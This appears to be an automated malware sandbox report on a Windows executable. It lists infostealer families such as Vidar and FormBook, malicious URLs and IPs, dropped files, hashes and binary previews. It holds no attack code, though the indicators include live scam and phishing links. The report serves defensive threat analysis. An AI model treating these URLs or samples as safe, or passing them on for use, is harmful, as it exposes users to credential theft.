                      TELEGRAMRUhttps://sula.starladeroff.com/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      https://tr.alertsgame.ru/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      file.exeGet hashmaliciousVidarBrowse
                      • 149.154.167.99
                      file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                      • 149.154.167.99
                      pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                      • 149.154.167.99
                      https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                      • 149.154.167.99
                      Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      Cheat.malware_exe.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.220
                      https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Ftelegra.ph%2FDavis-Insurance-Agency-LLC-06-28&E=kgarber%40woodlandsbank.com&X=XID311CFbwQP1837Xd1&T=WDLP&HV=U,E,X,T&H=3a14786ee7a8dd2b0305ef5dd961d4108cbfaf34Get hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      NFORCENLILTgEaPqmE.exeGet hashmaliciousUnknownBrowse
                      • 77.247.183.148
                      Jla3M8Fe16.exeGet hashmaliciousUnknownBrowse
                      • 77.247.183.151
                      http://beonlineboo.comGet hashmaliciousUnknownBrowse
                      • 179.60.150.123
                      http://www.bykiston.fiGet hashmaliciousUnknownBrowse
                      • 179.60.150.123
                      https://bitbucket.oreaillyauto.com/Get hashmaliciousUnknownBrowse
                      • 77.247.183.151
                      REQUEST SCHL-30112023-M1 Quotation_1033855).pdfGet hashmaliciousUnknownBrowse
                      • 192.121.17.232
                      https://beonlineboo.comGet hashmaliciousUnknownBrowse
                      • 179.60.150.123
                      https://beonlineboo.comGet hashmaliciousUnknownBrowse
                      • 179.60.150.123
                      http://beonlineboo.comGet hashmaliciousUnknownBrowse
                      • 179.60.150.123
                      http://recoconsign.comGet hashmaliciousUnknownBrowse
                      • 77.247.182.243
                      HETZNER-ASDEhttps://gmoq4wwvl9phy.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                      • 195.201.57.90
                      https://acmecomma.bitdocs.ai/share/d/cix0eL8Ef0J0SESMGet hashmaliciousUnknownBrowse
                      • 49.13.69.241
                      https://xxxjkam8s4e.z13.web.core.windows.net/?click_id=611h5aaw1cly4j0bmp&tid=701&subid=otka.com&ref=otka.com&883#Get hashmaliciousTechSupportScamBrowse
                      • 195.201.57.90
                      file.exeGet hashmaliciousVidarBrowse
                      • 49.13.159.121
                      hkLFB22XxS.exeGet hashmaliciousFormBookBrowse
                      • 135.181.212.206
                      file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                      • 49.13.159.121
                      pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                      • 49.13.159.121
                      https://he110ca11he1lpn0wwb112.pages.dev/Get hashmaliciousTechSupportScamBrowse
                      • 195.201.57.90
                      https://serviceca11he1pn0waa12.pages.dev/Get hashmaliciousTechSupportScamBrowse
                      • 195.201.57.90
                      1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                      • 49.13.159.121
                      BODIS-NJUSrPRESUPUESTO.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      http://sdfa.liveblog365.com/ares/hades.txtGet hashmaliciousUnknownBrowse
                      • 199.59.243.225
                      LinuxTF.elfGet hashmaliciousUnknownBrowse
                      • 199.59.243.226
                      eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                      • 199.59.243.226
                      Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                      • 199.59.243.226
                      PO S-TECHAccolle654657659768774876980.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      • 199.59.243.225
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      36f7277af969a6947a61ae0b815907a1orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.99
                      Setup.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      Setup.exeGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      paediatric neurologist medico legal 68003.jsGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      Alinco Pipe Supply FE Product Specification & Drawing DESIGN.xlsGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      Product Inquiry_#466788.xlsGet hashmaliciousFormBookBrowse
                      • 149.154.167.99
                      Alinco Pipe Supply FE Product Specification & Drawing DESIGN.xlsGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      7YZlAbfKMg.rtfGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.99
                      Product Inquiry466789.xlsGet hashmaliciousAgentTeslaBrowse
                      • 149.154.167.99
                      fs-windows-agent-3.4.0.msiGet hashmaliciousUnknownBrowse
                      • 149.154.167.99
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dllfile.exeGet hashmaliciousVidarBrowse
                        file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                          pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                            1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                              zyJWi2vy29.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRATBrowse
                                56bDgH9sMQ.exeGet hashmaliciousVidarBrowse
                                  vjYcExA6ou.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                    2E7ZdlxkOL.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                                      S8co1ACRdn.exeGet hashmaliciousCryptOne, VidarBrowse
                                        M9dfZzH3qn.exeGet hashmaliciousCryptOne, VidarBrowse
                                          C:\Users\user\AppData\Local\Temp\kat2B07.tmppDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                                            S8co1ACRdn.exeGet hashmaliciousCryptOne, VidarBrowse
                                              M9dfZzH3qn.exeGet hashmaliciousCryptOne, VidarBrowse
                                                5IRIk4f1PO.exeGet hashmaliciousCryptOne, VidarBrowse
                                                  unKdkI2OE7.exeGet hashmaliciousCryptOne, Mars Stealer, Stealc, VidarBrowse
                                                    igGqB0yylQ.exeGet hashmaliciousCryptOne, Mars Stealer, Stealc, VidarBrowse
                                                      I71ylA9bM6.exeGet hashmaliciousCryptOne, Mars Stealer, Stealc, VidarBrowse
                                                        RPI1VJ83ui.exeGet hashmaliciousCryptOne, Mars Stealer, Stealc, VidarBrowse
                                                          l3gMFGppEi.exeGet hashmaliciousCryptOne, Mars Stealer, Stealc, VidarBrowse
                                                            eyduk1OwKt.exeGet hashmaliciousCryptOne, Mars Stealer, Stealc, VidarBrowse
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                              Category:dropped
                                                              Size (bytes):77824
                                                              Entropy (8bit):1.133993246026424
                                                              Encrypted:false
                                                              SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                              MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                              SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                              SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                              SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
                                                              Category:dropped
                                                              Size (bytes):122880
                                                              Entropy (8bit):1.4530338001328815
                                                              Encrypted:false
                                                              SSDEEP:3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
                                                              MD5:9DEFC75D6086CCDBE05ED9EE2159CF84
                                                              SHA1:BCF6B1893581F2420564160F784E47E91946269A
                                                              SHA-256:04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
                                                              SHA-512:D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.3870145383915669
                                                              Encrypted:false
                                                              SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                              MD5:1623709C6B2FB813984B1265C26A85F1
                                                              SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                              SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                              SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:ASCII text, with very long lines (1567), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):8515
                                                              Entropy (8bit):5.230604417836901
                                                              Encrypted:false
                                                              SSDEEP:96:50ZWCyqs95eHz/z+yy1LSQOGN4bOVp0yVW0WJMWoYM9W7MQ8cPNL1+E8z9jJzWJZ:+nDs95e2Lua/eM+gQnf+E8z95oak
                                                              MD5:DCC26322AE76346F029CA9DEA29F5103
                                                              SHA1:44224532E21297B5B68B001CD1D7DD5C1BF89092
                                                              SHA-256:84888F3B3D70F34B45A1A524832B3D0AE7A83611BC65BCB79E2D1051EEFFE5FD
                                                              SHA-512:A765E1088632638B73C544B499451EC8BE686DAA6A88F6CE58440F0A2707D85B935984521401921077517C88967107707BE21502E461FDC67670D9CB1A8E19F7
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:# Mozilla User Preferences..../* Do not edit this file... *.. * If you make changes to this file while the application is running,.. * the changes will be overwritten when the application exits... *.. * To make a manual change to preferences, you can visit the URL about:config.. */....user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.xpi-signature-verification", 0);..user_pref("browser.bookmarks.restore_default_bookmarks", false);..user_pref("browser.cache.disk.capacity", 1048576);..user_pref("browser.cache.disk.filesystem_reported", 1);..user_pref("browser.cache.disk.smart_size.first_run", false);..user_pref("browser.cache.frecency_experiment", 3);..user_pref("browser.download.importedFromSqlite", true);..user_pref("browser.laterrun.bookkeeping.profileCreationTime", 1508238357);..user_pref("browser.laterrun.bookkeeping.sessionCount", 1);..user_pref("browser.laterrun.enabled", true);..user_pref("browser.migration.version", 42);.
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.7798653713156546
                                                              Encrypted:false
                                                              SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                              MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                              SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                              SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                              SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                              Category:dropped
                                                              Size (bytes):71954
                                                              Entropy (8bit):7.996617769952133
                                                              Encrypted:true
                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                              Malicious:false
                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):328
                                                              Entropy (8bit):3.144086598890895
                                                              Encrypted:false
                                                              SSDEEP:6:kK7i9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:TdDnLNkPlE99SNxAhUe/3
                                                              MD5:E806AE615D17B5559C21A2097C285C68
                                                              SHA1:C6655272147ECE033B06F027D1E61E77AC8A060A
                                                              SHA-256:5F39BCD541ED6E8DB608429D7E0847D7B4E484CBD798AFCECA0BE2E87AB531E9
                                                              SHA-512:371CB7AD57690578D25F3BDBB5648C263C94A78E1CD004508EA49C83747E7F06E1048683E160CD61755CF2176F78E8A431B5E853CEA4B966537E67673A5DEA36
                                                              Malicious:false
                                                              Preview:p...... .........AU.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2459136
                                                              Entropy (8bit):6.052474106868353
                                                              Encrypted:false
                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: pDHKarOK2v.exe, Detection: malicious, Browse
                                                              • Filename: 1719859269.0326595_setup.exe, Detection: malicious, Browse
                                                              • Filename: zyJWi2vy29.exe, Detection: malicious, Browse
                                                              • Filename: 56bDgH9sMQ.exe, Detection: malicious, Browse
                                                              • Filename: vjYcExA6ou.exe, Detection: malicious, Browse
                                                              • Filename: 2E7ZdlxkOL.exe, Detection: malicious, Browse
                                                              • Filename: S8co1ACRdn.exe, Detection: malicious, Browse
                                                              • Filename: M9dfZzH3qn.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                              Category:dropped
                                                              Size (bytes):71954
                                                              Entropy (8bit):7.996617769952133
                                                              Encrypted:true
                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                              Malicious:false
                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):186277
                                                              Entropy (8bit):6.35155733287026
                                                              Encrypted:false
                                                              SSDEEP:1536:aAZw/J+lCUsTRvsqgCyqWlUDNWdm1wpSru2A0XwjY/z02DTr3rmt6mZ:as2J+qTR0XCy/dmASru2AijbdG
                                                              MD5:4EA6026CF93EC6338144661BF1202CD1
                                                              SHA1:A1DEC9044F750AD887935A01430BF49322FBDCB7
                                                              SHA-256:8EFBC21559EF8B1BCF526800D8070BAAD42474CE7198E26FA771DBB41A76B1D8
                                                              SHA-512:6C7E0980E39AACF4C3689802353F464A08CD17753BD210EE997E5F2A455DEB4F287A9EF74D84579DBDE49BC96213CD2B8B247723919C412EA980AA6E6BFE218B
                                                              Malicious:false
                                                              Preview:0.....*.H..........0......1.0...`.H.e......0......+.....7.......0....0...+.....7...............240514162318Z0...+......0...20..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                              Process:C:\Users\user\Desktop\82xul16VKj.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):881664
                                                              Entropy (8bit):6.555251818096116
                                                              Encrypted:false
                                                              SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                              MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                              SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                              SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                              SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                              Joe Sandbox View:
                                                              • Filename: pDHKarOK2v.exe, Detection: malicious, Browse
                                                              • Filename: S8co1ACRdn.exe, Detection: malicious, Browse
                                                              • Filename: M9dfZzH3qn.exe, Detection: malicious, Browse
                                                              • Filename: 5IRIk4f1PO.exe, Detection: malicious, Browse
                                                              • Filename: unKdkI2OE7.exe, Detection: malicious, Browse
                                                              • Filename: igGqB0yylQ.exe, Detection: malicious, Browse
                                                              • Filename: I71ylA9bM6.exe, Detection: malicious, Browse
                                                              • Filename: RPI1VJ83ui.exe, Detection: malicious, Browse
                                                              • Filename: l3gMFGppEi.exe, Detection: malicious, Browse
                                                              • Filename: eyduk1OwKt.exe, Detection: malicious, Browse
                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:ASCII text
                                                              Category:modified
                                                              Size (bytes):119
                                                              Entropy (8bit):4.605817217818112
                                                              Encrypted:false
                                                              SSDEEP:3:YqkwiIcsGtRzD520UQ2MWc3UMXLBBLRYUULAPvn:CwiIrO2tXM7XLl5mqvn
                                                              MD5:3EFD2B7B7DD27F6B764E701AEAF43DFF
                                                              SHA1:ECB52F1F8BD72D1243A2C446E778AC12D8A0565B
                                                              SHA-256:C996B15B6DE5D7431DBCC6044B7ACDB84014C131D469531938BCB7475293A1C5
                                                              SHA-512:E228A1043649169020698770768420B665FD78773C04E1BDB2C61774FCF4E8117A64ABC9E90E4B72C28AC9BECA65049935013647D7183E9FF939224CC801EFE6
                                                              Malicious:false
                                                              Preview:parking_session.baf82661-e91b-444a-95fc-a8abc3fa4f75.survey-smiles.com/.1536.1039441152.31116513.1724241744.31116512.*.
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):101
                                                              Entropy (8bit):4.1975931885051265
                                                              Encrypted:false
                                                              SSDEEP:3:pLvj3BTWAoXCMcSGJLIA0jbdZX7vWGTSbQdEQWUULAPvn:N3FW6SGFSNevDUmqvn
                                                              MD5:EE1565ED2DF88042019FF8984A95F12A
                                                              SHA1:039BC727194348C11E67FAA8147402430FF3869F
                                                              SHA-256:C8D1A953554A8BCC8AEB3438EBA4D3DC11D04DD5827164B027B7DF6EE17CA933
                                                              SHA-512:D83275050C76D8B737F942E2CBF1604FA1E4C30E9672B6B98ED08295E7D7054F2EA866D1D63E9F7E48E70F805CF93C4A3584058090F4A0DB7472080E10B849E0
                                                              Malicious:false
                                                              Preview:stel_ssid.d1e222eee8c843edfb_3455152776784339756.t.me/.9729.1000949248.31116712.185854124.31116512.*.
                                                              Process:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):100
                                                              Entropy (8bit):4.332987472625654
                                                              Encrypted:false
                                                              SSDEEP:3:lTW//WLIwI9BIhorh+eBWCNvhPhCQAPvn:lToUY97I4Nvrqvn
                                                              MD5:D2DF4C7AD5D7DB344633FF6EDBCFAAB3
                                                              SHA1:8B8CF58227296A25DEB662F575B7FF6096055AB6
                                                              SHA-256:B963444E0A28A7B4577E67CBFDD8641534D4F17B2893034EBC7F75754B89C8B0
                                                              SHA-512:3CD246C9F87EEE6EDF0B83981E9D2A870F6D6C7BC2B056F0008634C5D62F8E498FEC63285E0407B1CE88D602B80EDDA44E8CF3F1190DC4940C9F33F2BE7DDB1E
                                                              Malicious:false
                                                              Preview:sid.6305125f-38d2-11ef-a8ad-bd9200aff948.arpdabl.org/.9728.599375744.36116511.1709109969.31116512.*.
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.286916556659694
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 91.23%
                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.07%
                                                              • Win32 Executable Borland Delphi 6 (262906/60) 2.40%
                                                              • Win32 Executable Delphi generic (14689/80) 0.13%
                                                              • Windows Screen Saver (13104/52) 0.12%
                                                              File name:82xul16VKj.exe
                                                              File size:1'608'192 bytes
                                                              MD5:eb2f14b68aa11a4aea94985c87714811
                                                              SHA1:2fa340debaa9fbe53ad934403d64a827ddde9445
                                                              SHA256:07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957
                                                              SHA512:c503d02f30c87b3a557314b2d7ad6f90fcaed8f0f7265975813f67f398cc85cbf4690f330736f63641c493cb1e383be6c4d059e33a4c9bfd6ad9ed612af6d942
